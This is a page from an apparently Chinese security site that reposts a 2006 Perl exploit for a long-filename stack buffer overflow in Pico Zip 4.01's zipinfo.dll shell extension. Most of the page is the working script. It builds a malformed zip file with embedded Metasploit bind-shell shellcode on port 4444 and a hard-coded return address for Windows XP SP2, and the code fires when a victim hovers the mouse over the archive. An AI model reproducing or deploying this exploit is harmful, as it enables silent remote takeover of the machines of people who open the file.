首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Pico Zip 4.01 (Long Filename) Buffer Overflow Exploit
来源:http://www.securityfocus.com 作者:c0rrupt 发布时间:2006-06-16  

#!/usr/bin/perl
# Pico Zip v. 4.01 Long Filename Buffer Overflow
# Original advisory - http://www.securityfocus.com/archive/1/437103/30/30/threaded
# Author - c0rrupt
# Greets - sh0uts to n0limit, muts, and brax for the music ;)
#
# The vulnerability is caused due to a boundary error within the
# "zipinfo.dll" info tip shell extension when reading a ACE, RAR, or
# ZIP archive that contains a file with an overly long filename. This
# can be exploited to cause a stack-based buffer overflow when the user
# moves the mouse cursor over a malicious archive either in Windows
# Explorer or from any program that uses the file-open dialog box.
#
# Running this script will generate a malformed zip file that will execute
# the given shellcode when a user moves his cursor over the file.
# (This exploit bypasses stack protection and DEP)

$offset = "\x6F\xE2\xD7\x5A"; #Windows XP SP2 English

# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
$shellcode =
"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xa3".
"\x52\xaa\x9a\x83\xeb\xfc\xe2\xf4\x5f\x38\x41\xd7\x4b\xab\x55\x65".
"\x5c\x32\x21\xf6\x87\x76\x21\xdf\x9f\xd9\xd6\x9f\xdb\x53\x45\x11".
"\xec\x4a\x21\xc5\x83\x53\x41\xd3\x28\x66\x21\x9b\x4d\x63\x6a\x03".
"\x0f\xd6\x6a\xee\xa4\x93\x60\x97\xa2\x90\x41\x6e\x98\x06\x8e\xb2".
"\xd6\xb7\x21\xc5\x87\x53\x41\xfc\x28\x5e\xe1\x11\xfc\x4e\xab\x71".
"\xa0\x7e\x21\x13\xcf\x76\xb6\xfb\x60\x63\x71\xfe\x28\x11\x9a\x11".
"\xe3\x5e\x21\xea\xbf\xff\x21\xda\xab\x0c\xc2\x14\xed\x5c\x46\xca".
"\x5c\x84\xcc\xc9\xc5\x3a\x99\xa8\xcb\x25\xd9\xa8\xfc\x06\x55\x4a".
"\xcb\x99\x47\x66\x98\x02\x55\x4c\xfc\xdb\x4f\xfc\x22\xbf\xa2\x98".
"\xf6\x38\xa8\x65\x73\x3a\x73\x93\x56\xff\xfd\x65\x75\x01\xf9\xc9".
"\xf0\x01\xe9\xc9\xe0\x01\x55\x4a\xc5\x3a\xbb\xc6\xc5\x01\x23\x7b".
"\x36\x3a\x0e\x80\xd3\x95\xfd\x65\x75\x38\xba\xcb\xf6\xad\x7a\xf2".
"\x07\xff\x84\x73\xf4\xad\x7c\xc9\xf6\xad\x7a\xf2\x46\x1b\x2c\xd3".
"\xf4\xad\x7c\xca\xf7\x06\xff\x65\x73\xc1\xc2\x7d\xda\x94\xd3\xcd".
"\x5c\x84\xff\x65\x73\x34\xc0\xfe\xc5\x3a\xc9\xf7\x2a\xb7\xc0\xca".
"\xfa\x7b\x66\x13\x44\x38\xee\x13\x41\x63\x6a\x69\x09\xac\xe8\xb7".
"\x5d\x10\x86\x09\x2e\x28\x92\x31\x08\xf9\xc2\xe8\x5d\xe1\xbc\x65".
"\xd6\x16\x55\x4c\xf8\x05\xf8\xcb\xf2\x03\xc0\x9b\xf2\x03\xff\xcb".
"\x5c\x82\xc2\x37\x7a\x57\x64\xc9\x5c\x84\xc0\x65\x5c\x65\x55\x4a".
"\x28\x05\x56\x19\x67\x36\x55\x4c\xf1\xad\x7a\xf2\x53\xd8\xae\xc5".
"\xf0\xad\x7c\x65\x73\x52\xaa\x9a";

$filename = $shellcode . "A"x(524-length($shellcode)) . $offset;


$head = "\x50\x4B\x03\x04\x14\x00\x00\x00\x00\x00".
"\xB7\xAC\xCE\x34\x00\x00\x00\x00\x00\x00".
"\x00\x00\x00\x00\x00\x00\x14\x02\x00\x00";

$middle = "\x2e\x74\x78\x74\x50\x4B\x01\x02\x14\x00".
"\x14\x00\x00\x00\x00\x00\xB7\xAC\xCE\x34".
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
"\x00\x00\x14\x02\x00\x00\x00\x00\x00\x00".
"\x01\x00\x24\x00\x00\x00\x00\x00\x00\x00";

$tail = "\x2e\x74\x78\x74\x50\x4B\x05\x06\x00\x00".
"\x00\x00\x01\x00\x01\x00\x42\x02\x00\x00".
"\x32\x02\x00\x00\x00\x00";

$evilzip = $head . $filename . $middle . $filename . $tail;

open(ZIPFILE,">exploit.zip")|| die "cannot open output file";
print(ZIPFILE $evilzip) || die "cannot write to output file";
close(ZIPFILE);




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·CesarFTP 0.99g (MKD) Remote Bu
·bitweaver <= 1.3 (tmpImageP
·MS Windows XP/2K (Mrxsmb.sys)
·Mambo <= 4.6rc1 (Weblinks)
·MS Windows (NtClose DeadLock)
·FlashBB <= 1.1.5 (phpbb_roo
·MyBulletinBoard (MyBB) < 1.
·Joomla <= 1.0.9 (Weblinks)
·CesarFTP 0.99g (MKD) Remote Bu
·Microsoft Excel Unicode Local
·blur6ex <= 0.3.462 (ID) Adm
·Winamp <= 5.21 (Midi File H
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved